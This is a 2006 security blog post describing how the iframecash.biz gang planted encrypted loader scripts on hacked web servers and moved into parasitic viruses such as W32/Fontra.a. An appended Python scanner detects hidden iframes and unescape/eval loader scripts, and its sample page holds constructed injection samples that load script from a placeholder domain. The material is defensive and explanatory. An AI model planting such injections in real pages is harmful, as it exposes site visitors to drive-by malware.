Monday, May 29, 2006

Spyware goes the parasitic way

The concept of ‘parasitic spyware’ predates the popularity of the terms Spyware and Adware. W95/MTX was a parasitic virus discovered nearly six years ago, and it contained a backdoor (one type of spyware that allows a remote attacker to control an infected computer). In recent years there has been a clear distinction between the well-organized spyware creators and the parasitic virus authors, but that may be changing. The group behind traffall.biz, the so-called iframecash.biz gang, has begun to move into the area of parasitic virus creation, as seen with the discovery of W32/Fontra.a. This is the same group that heavily exploited [Exploit-WMF], a 0-day WMF buffer overflow vulnerability, around the time it was discovered.

They are known for, among other things, hacking web servers to embed small encrypted script code that loads other web pages containing various exploit code (such as Exploit-ANIFile, Exploit-ByteVerify, Exploit-CodeBase, etc.). Typically the exploit code results in a downloader .EXE file being run on vulnerable systems, which then installs dozens of other downloaders, spam, proxy, and password-stealing trojans. It is also common for rogue anti-spyware scanners to get installed along the way, such as SpySheriff, SpyAxe or BraveSentry. This group keeps the target moving and appears to be well funded, which could mean a rise in the number of parasitic infectors discovered over the next several months. Who is funding those guys, organised crime? We don't know yet, but time will tell...
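A web server operator who wants to spot the kind of injection described above (a zero-size iframe, or an inline script that feeds a long run of hex escapes to unescape()/eval()) can scan served pages for those two patterns. The following is an added example, not code from the original post; the sample page, the detection thresholds and the example.invalid domain are constructed for illustration:

```python
import re
from html.parser import HTMLParser

# Constructed sample page: one legitimate script plus two injections of the kind
# described in the post. example.invalid is a placeholder, not a real indicator.
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<script src="/static/site.js"></script>
<iframe src="http://example.invalid/in.cgi?3" width="0" height="0"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//example.invalid/x.js%22%3E%3C/script%3E'))</script>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
HEX_ESCAPE = re.compile(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}", re.I)
DECODER_CALL = re.compile(r"\b(unescape|eval)\s*\(", re.I)
MIN_ESCAPES = 8  # assumed threshold: legitimate inline scripts rarely carry this many


class InjectionScanner(HTMLParser):
    """Collects findings for hidden iframes and obfuscated inline loader scripts."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
            if tiny or HIDDEN_STYLE.search(a.get("style", "")):
                self.findings.append(f"hidden iframe -> {a.get('src', '?')}")
        elif tag == "script":
            self._in_script = True

    def handle_data(self, data):
        # Inline script body: a decoder call over many hex escapes is the classic loader pattern.
        if self._in_script and DECODER_CALL.search(data) and len(HEX_ESCAPE.findall(data)) >= MIN_ESCAPES:
            self.findings.append("obfuscated inline script (unescape/eval over hex escapes)")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def scan_html(html):
    """Return the list of injection findings for one HTML document."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```

Run it over a copy of each page on the server and diff the findings against a known-clean baseline; a new hidden iframe or decoder blob appearing on a page nobody edited is the signal to investigate the host.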